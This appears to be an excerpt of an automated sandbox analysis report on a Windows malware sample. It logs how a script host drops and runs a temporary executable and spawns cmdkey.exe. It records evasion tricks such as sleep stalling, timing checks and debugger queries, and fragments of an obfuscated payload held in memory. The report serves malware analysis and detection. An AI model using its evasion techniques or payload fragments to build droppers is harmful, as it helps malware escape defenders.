        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmdkey.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Stalling execution: Execution stalls by calling Sleep graph_2-4354
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 34CEB08
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 1A8EB08
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 7FFE6B430594
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 7FFE6B42FF74
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 7FFE6B42D6C4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API/Special instruction interceptor: Address: 7FFE6B42D864
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D144
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B430594
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D764
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D324
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D364
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D004
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42FF74
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D6C4
        Source: C:\Windows\SysWOW64\cmdkey.exe API/Special instruction interceptor: Address: 7FFE6B42D864
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D81763 rdtsc 3_2_32D81763
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\cmdkey.exe Window / User API: threadDelayed 9852
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 879
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 878
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API coverage: 0.3 %
        Source: C:\Windows\SysWOW64\cmdkey.exe API coverage: 1.0 %
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632 Thread sleep count: 122 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632 Thread sleep time: -244000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632 Thread sleep count: 9852 > 30
        Source: C:\Windows\SysWOW64\cmdkey.exe TID: 7632 Thread sleep time: -19704000s >= -30000s
        Source: C:\Windows\SysWOW64\cmdkey.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\cmdkey.exe Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_004065AA FindFirstFileW,FindClose, 2_2_004065AA
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_00402B75 FindFirstFileW, 2_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_00402B75 FindFirstFileW, 3_2_00402B75
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 3_2_004066F4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_004065AA FindFirstFileW,FindClose, 3_2_004065AA
        Source: wscript.exe, 00000000.00000003.19737646187.0000021570516000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bwRav0Y8MCdnM7/KvSEqmDw9xAWu1/vHhc;;;pxFXEFiGHgCb6AN...in;;;Wo8Zss9MGt18vmCIOxO8nbfX4ZlUcq+e91pvD4XSN0xlb4Zjobp+e5k/
        Source: wscript.exe, 00000000.00000003.19719138446.000002156FE91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: N...in;;;Wo8Zss9MGt18vmCIOxO8nbfX4ZlUcq+e91pvD4XSN0xlb4Zjobp+e5k/))Y/&&&IU&&&...lKL;;;
        Source: wscript.exe, 00000000.00000003.19739306186.000002157054D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19737152269.000002157051F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732830491.00000215704D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19736701102.0000021570507000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19742070398.000002157054D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <&&&x50gXd...tK/jR&&&ihgfS+3WDuPEm
        Source: wscript.exe, 00000000.00000003.19717592851.000002156FE19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717374132.000002156FE0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717973004.000002156FE31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19718487210.000002156FE3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717686950.000002156FE30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19716829408.000002156FDCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717161793.000002156FDE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8Yz
        Source: wscript.exe, 00000000.00000003.19731988448.000002156FF46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733857534.000002156FF4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19734168798.000002156FF52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <&&&x50gXd...tK/jR&&&ihgfS+3WDu1t[
        Source: wscript.exe, 00000000.00000003.19717478144.000002156FDF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717559838.000002156FE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19716829408.000002156FDCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19717161793.000002156FDE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fyd0xazxDa0&&&F))&&&x50gXd...tK/jR&&&ihgfS+3WDu))qKD1DNCm&&&K4CpUwXrugyZ/dwG))gxMznyv8qr2vOZmUnCEL0dC7KEf8Ijim4yjsWraX;;;wuPiwwbEp7fdb;;;89))YlKo42gsS/x/&&&O;;;OO6YvmrXH7&&&7D))3kYsjIN...ibfbv&&&gfgor...wjqO73c5E...))GSql7vIE0Sakj6PWGeM493H2yCM/&&&HvQ26DOC0lh&&&f$
        Source: wscript.exe, 00000000.00000003.19699697478.0000021570399000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19697552235.0000021570390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19696896139.0000021570372000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8Y
        Source: wscript.exe, 00000000.00000003.19720152791.000002156FE96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19721127089.000002156FEB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19728912654.000002156FEDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19722569290.000002156FED6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19723874670.000002156FED8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19719138446.000002156FE91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19720744467.000002156FEA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lygzfyd0xazxDa0&&&F))&&&x50gXd...tK/jR&&&ihgfS+3WDu))qKD1DNCm&&&K4CpUwXrugyZ/dwG))gxMznyv8qr2vOZmUnCEL0dC7KEf8Ijim4yjsWraX;;;wuPiwwbEp7fdb;;;89))YlKo42gsS/x/&&&O;;;OO6YvmrXH7&&&7D))3kYsjIN...ibfbv&&&gfgor...wjqO73c5E...))GSql7vIE0Sakj6PWGeM493H2yCM/&&&HvQ26DOC0lh&&&fu
        Source: wscript.exe, 00000000.00000003.19732112682.000002156FD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733444126.000002156FDAB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19745616939.000002156FDAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19740878308.000002156FD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19732614950.000002156FD6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.19733082746.000002156FD81000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2sY7Q8IQQCM...vwgAEOIk/nERy1Oy+jKw/wjz&&&;;;5RRWwQlrFv/&&&aPWjGcrbXwUze8/io9xdv...6CwwFZkiYWs/GsqPv9A3...d7k;;;fD9itfgiFt3hFqzNA9v9Q/LNvymrnvviRFy...o+Glz4y...94rU1Y3ZhgfsUh9d89xgf5&&&s8sEGgfylXUy8YApHNlYXgj+zxb77WPkRCoLbmk1kzM2c;;;Wh7Qdet;;;&&&uc/1y/8yvb1b&&&0QwU0MC;;;+;;;X3C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe API call chain: ExitProcess graph end node graph_2-4054
        Source: C:\Windows\SysWOW64\cmdkey.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\cmdkey.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\cmdkey.exe Process queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D81763 rdtsc 3_2_32D81763
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D834E0 NtCreateMutant,LdrInitializeThunk, 3_2_32D834E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 2_2_6FC32351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 2_2_6FC32351
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D632C5 mov eax, dword ptr fs:[00000030h] 3_2_32D632C5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D732C0 mov eax, dword ptr fs:[00000030h] 3_2_32D732C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D732C0 mov eax, dword ptr fs:[00000030h] 3_2_32D732C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E132C9 mov eax, dword ptr fs:[00000030h] 3_2_32E132C9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D502F9 mov eax, dword ptr fs:[00000030h] 3_2_32D502F9
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D372E0 mov eax, dword ptr fs:[00000030h] 3_2_32D372E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4A2E0 mov eax, dword ptr fs:[00000030h] 3_2_32D4A2E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h] 3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h] 3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h] 3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D482E0 mov eax, dword ptr fs:[00000030h] 3_2_32D482E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3D2EC mov eax, dword ptr fs:[00000030h] 3_2_32D3D2EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3D2EC mov eax, dword ptr fs:[00000030h] 3_2_32D3D2EC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h] 3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h] 3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D47290 mov eax, dword ptr fs:[00000030h] 3_2_32D47290
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E092AB mov eax, dword ptr fs:[00000030h] 3_2_32E092AB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBE289 mov eax, dword ptr fs:[00000030h] 3_2_32DBE289
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h] 3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h] 3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h] 3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E1B2BC mov eax, dword ptr fs:[00000030h] 3_2_32E1B2BC
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3C2B0 mov ecx, dword ptr fs:[00000030h] 3_2_32D3C2B0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFF2AE mov eax, dword ptr fs:[00000030h] 3_2_32DFF2AE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D642AF mov eax, dword ptr fs:[00000030h] 3_2_32D642AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D642AF mov eax, dword ptr fs:[00000030h] 3_2_32D642AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D392AF mov eax, dword ptr fs:[00000030h] 3_2_32D392AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFF247 mov eax, dword ptr fs:[00000030h] 3_2_32DFF247
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6F24A mov eax, dword ptr fs:[00000030h] 3_2_32D6F24A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h] 3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h] 3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B273 mov eax, dword ptr fs:[00000030h] 3_2_32D3B273
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DD327E mov eax, dword ptr fs:[00000030h] 3_2_32DD327E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFD270 mov eax, dword ptr fs:[00000030h] 3_2_32DFD270
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3821B mov eax, dword ptr fs:[00000030h] 3_2_32D3821B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DCB214 mov eax, dword ptr fs:[00000030h] 3_2_32DCB214
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DCB214 mov eax, dword ptr fs:[00000030h] 3_2_32DCB214
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3A200 mov eax, dword ptr fs:[00000030h] 3_2_32D3A200
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D60230 mov ecx, dword ptr fs:[00000030h] 3_2_32D60230
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h] 3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h] 3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC0227 mov eax, dword ptr fs:[00000030h] 3_2_32DC0227
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h] 3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h] 3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7A22B mov eax, dword ptr fs:[00000030h] 3_2_32D7A22B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D733D0 mov eax, dword ptr fs:[00000030h] 3_2_32D733D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D743D0 mov ecx, dword ptr fs:[00000030h] 3_2_32D743D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC43D5 mov eax, dword ptr fs:[00000030h] 3_2_32DC43D5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h] 3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h] 3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E3C0 mov eax, dword ptr fs:[00000030h] 3_2_32D3E3C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3C3C7 mov eax, dword ptr fs:[00000030h] 3_2_32D3C3C7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D463CB mov eax, dword ptr fs:[00000030h] 3_2_32D463CB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h] 3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h] 3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6A390 mov eax, dword ptr fs:[00000030h] 3_2_32D6A390
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h] 3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h] 3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h] 3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h] 3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41380 mov eax, dword ptr fs:[00000030h] 3_2_32D41380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5F380 mov eax, dword ptr fs:[00000030h] 3_2_32D5F380
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFF38A mov eax, dword ptr fs:[00000030h] 3_2_32DFF38A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBC3B0 mov eax, dword ptr fs:[00000030h] 3_2_32DBC3B0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D493A6 mov eax, dword ptr fs:[00000030h] 3_2_32D493A6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D493A6 mov eax, dword ptr fs:[00000030h] 3_2_32D493A6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h] 3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h] 3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D38347 mov eax, dword ptr fs:[00000030h] 3_2_32D38347
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h] 3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h] 3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h] 3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DBE372 mov eax, dword ptr fs:[00000030h] 3_2_32DBE372
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6237A mov eax, dword ptr fs:[00000030h] 3_2_32D6237A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC0371 mov eax, dword ptr fs:[00000030h] 3_2_32DC0371
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC0371 mov eax, dword ptr fs:[00000030h] 3_2_32DC0371
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D4B360 mov eax, dword ptr fs:[00000030h] 3_2_32D4B360
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7E363 mov eax, dword ptr fs:[00000030h] 3_2_32D7E363
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h] 3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h] 3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5E310 mov eax, dword ptr fs:[00000030h] 3_2_32D5E310
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7631F mov eax, dword ptr fs:[00000030h] 3_2_32D7631F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D39303 mov eax, dword ptr fs:[00000030h] 3_2_32D39303
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D39303 mov eax, dword ptr fs:[00000030h] 3_2_32D39303
